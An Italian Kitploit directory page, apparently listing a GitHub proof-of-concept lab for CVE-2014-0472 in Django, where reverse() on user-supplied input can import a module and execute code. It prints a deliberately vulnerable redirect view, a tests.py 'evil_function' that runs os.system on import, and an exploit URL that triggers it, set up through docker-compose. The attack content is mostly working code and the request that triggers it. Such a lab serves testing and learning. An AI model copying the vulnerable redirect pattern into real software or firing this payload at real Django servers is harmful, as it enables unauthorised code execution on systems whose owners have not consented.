Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2014-0472 — CVE-2014-0472 Django esecuzione di codice imprevista tramite reverse() | Kitploit
Strumenti/GitHubGitHub/christasa/cve-2014-0472
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubchristasa/cve-2014-0472

CVE-2014-0472

CVE-2014-0472 Django esecuzione di codice imprevista tramite reverse()

Vedi Repository
715 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2014-0472

Usa

root@kitploit:~
docker-compose up -d

Accedi a localhost:8083

Riferimento: https://www.djangoproject.com/weblog/2014/apr/21/security/

  1. Sono presenti una o più viste che costruiscono un URL basato sull'input dell'utente (comunemente, un parametro "next" in una querystring che indica dove reindirizzare al completamento con successo di un'azione).
  2. Uno o più moduli, noti a un attaccante come esistenti sul percorso di import Python del server, eseguono codice con effetti collaterali all'importazione.

In tests.py

root@kitploit:~
def evil_function():
    print("exploit successful")
    os.system("echo > /tmp/`whoami` ")
    return os.getuid()


evil = evil_function()

In views.py

root@kitploit:~
def redirect_test(request):
        page = request.GET.get('page', None)
        if page is not None:
                redirect(page)
        return HttpResponse("OK")

Usa la funzione redirect per chiamare la funzione evil

avater

Usa exp

root@kitploit:~
http://your-ip:8083/example?page=app.tests.evil

avater

Sfruttato

avater

Scarica lo strumento